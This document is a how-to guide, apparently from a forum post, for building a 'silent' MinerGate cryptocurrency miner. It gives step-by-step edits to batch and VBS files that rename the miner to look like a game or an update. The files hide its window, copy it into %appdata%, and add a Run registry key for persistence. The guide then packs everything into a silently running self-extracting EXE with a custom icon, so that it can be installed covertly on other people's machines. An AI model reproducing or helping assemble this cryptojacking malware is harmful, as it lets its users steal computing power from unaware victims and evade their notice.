﻿How to make any Cryptocurrency Silent Miner -- Minergate Miners 2020

Before starting up everything to make silent miner. Once you extract the miner file you will also find "Tigerzplace %.rar" file in the folder which is my percentage, If you are willing to include my percentage so I'll also get some earning from your miners. So just extract this file here and if you just wanna make your own miner no percent, no share , no nothing at all just yours. Then just delete this rar file and we are good to good with the other process. 



First Step | Start.bat



First of all setting up the cryptocurrency for which you want to build the silent miner.



Right click on "start.bat" file and click edit.

Then replace "minergate44@gmail.com" with your email or username which you use for minergate account.

____________________________________________



If you don't have Minergate Account. Make one using my refer link:

https://minergate.com/a/3eee33f9e10a08087497cc2f



____________________________________________





Now replace xmr with any coin you want to mine. let say you want to make ETH Silent Miner. Then replace xmr with eth. If you want other coins letters to use in the miner. You can check out minergate website for more detail about every cryptocurrency and its name which you can use in the crypto silent miner. Like for monero classic you can use 'xmo'. Similarly every cryptocurreny has its short name for miner. Make sure you check it out in minergate website.



Next thing is about the CPU usage. You will notice 2 after xmr. This represent the thread which the silent miner will be using for cryptocurrency minning silenty. I recommend not to use more then 2. If you want to use less cpu usage let say 20-40% of a pc. Then I recommend to use 1 instead 2.



Lastly you need to rename the win name in the start.bat file according to your choice. This win represent the process name. You will find win.exe in the folder. This is the actual xFast miner which I downloaded from minergate website. You can download for your self the updated version as well if you got new updates by the time your are trying this method. Its all clean and fully open source method. I didn't use any binded or infected application for my own purpose. Its fully clean and shared. Anyway you need to rename win in the start file as well as in the folder.



Let say I renamed the file in the folder to game.exe so in the start.bat file I also need to replace win with game.



game --user minergate44@gmail.com --eth 2



It will something look like this after modification. Now when ever the silent miner is ready and I run it. The background process name will be game which will silently mine cryptocurrency for me. In this case ethereum minning will be done.



Now just save the 'start.bat' file and you are done with the first step.



Second Step | Setup.bat



Now the next file which you need to modify is the setup.bat. Here you will find strange % related strings. Basically in this file we set up the target folder where the miner will be install 
silenty and will copy its file in windows directory or where ever you set up the path.



So first thing you need to modify is this string: "%appdata%"\silent

By default the silent miner will copy it self to a folder "silent" in appdate. If you want to change the path. 
Just simply change "silent" with any other folder name you want. Make sure a name with no spaces or you will end up with some errors. 
Also remember this path so you will further need to set it in one other file "startup.vbs" later on in this process.

Let say I want to set new path for silent miner. "%appdata%"\CryptoMiner . I changed text "silent" to "CryptoMiner" so make sure you also change other text in the same file which is silent.

. I'll also need this path later on to set in startup.vbs file. So keep this in mind.



Now next thing is the start up key. You need to change "StartupName" with any name you want. This will be the name for start up file which someone will be able to see if they open startup tab. 
Let say I want to update it to GameUpdates.



Now the next thing you need to update is the startup.vbs name which you will notice in this file. This is the file name which will be used as a startup. 
Earlier as we changed win to game so we also renamed the actual files in the same folder. Here if you want to change the startup.vbs name in the file you will also then need to rename
 the startup.vbs file outside in the folder. Let say I want to change the name in the file to Update.vbs so also I need to rename the actual file in the folder to Update.vbs 
Now all after modifying the names and renaming the actual file in the folder. The string in the file will be modified like this.



REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "GameUpdates" /t REG_SZ /d "%appdata%\CryptoMiner\Update.vbs" /f%appdata%\CryptoMiner\Update.vbs



%appdata%\CryptoMinert\start.vbs



Also notice how silent name is replaced with CryptoMiner after modification, and how StartupName is replaced with GameUpdates & also startup.vbs is replaced with 
Update.vbs keeping in mind that the actual file in the folder is also renamed as Update.vbs as it was startup.vbs before.



Third Step | startup.exe (Update.exe)



Now you need to do some editing in the startup.vbs. For me it will be Update.vbs. For your case it will be renamed according to your choice in the second step. 
So for editing just right click Update.vbs and select Edit.



Dim path
Set WshShell = CreateObject("WScript.Shell")
path = WshShell.expandEnvironmentStrings("%appdata%"\silent")
WshShell.CurrentDirectory= path
WshShell.Run chr(34) & "start.vbs" & Chr(34), 0
Set WshShell = Nothing


You will get above code in the vbs file. Don't edit the rest lines, just replace the path with your new path which you have set in the previous second step where 
I told you to keep this path in mind we will need this in further process later on. In my case, path will be modified as> Path="%appdata%"\CryptoMiner. And then save the file.

Last Step | Making Exe Silent Miner File.



NOTE: Before making it as exe silent miner, make sure you just manually check out the miner if it is working or not. 
After which you can go for the archiving. Its just a quick hint for making accurate silent miner.



PS: For checking just click the start.bat and check out the status, if its running without any error and you can see some hash rates stuff then you are good to go.



Now in the last step you have to make a pack exe file of the silent miner. For that select all the files except the method.txt file (which will be in the folder) and right click it. 
You will get a menu in which you have to select "Add to Archive", click it. You will get a archive window with a lot of options. You just need to check "Create SFX Archive" and select 
best compression method from the drop down list on the left side labeled as "Compression Method".



Now just go to Comment tab in the top menu bar and paste the following comments in the comment section.

____________________________________________



;The comment below contains SFX script commands



Path=%temp%

Setup=setup.vbs

TempMode

Silent=1

Overwrite=2

____________________________________________



Don't do any changes in the comments. However if you want to change the icon of the exe file (Silent Miner). You can change that by going into Advance tab and the opening SFX options. 
In that go to "Text and icon" tab and from there you can set up your own icon for the silent miner.



Now you are done with all the process just save the file and it will create one exe file. This will be your own minergate silent miner for any cryptocurrency 
which in this case will be Ethereum Silent Miner.
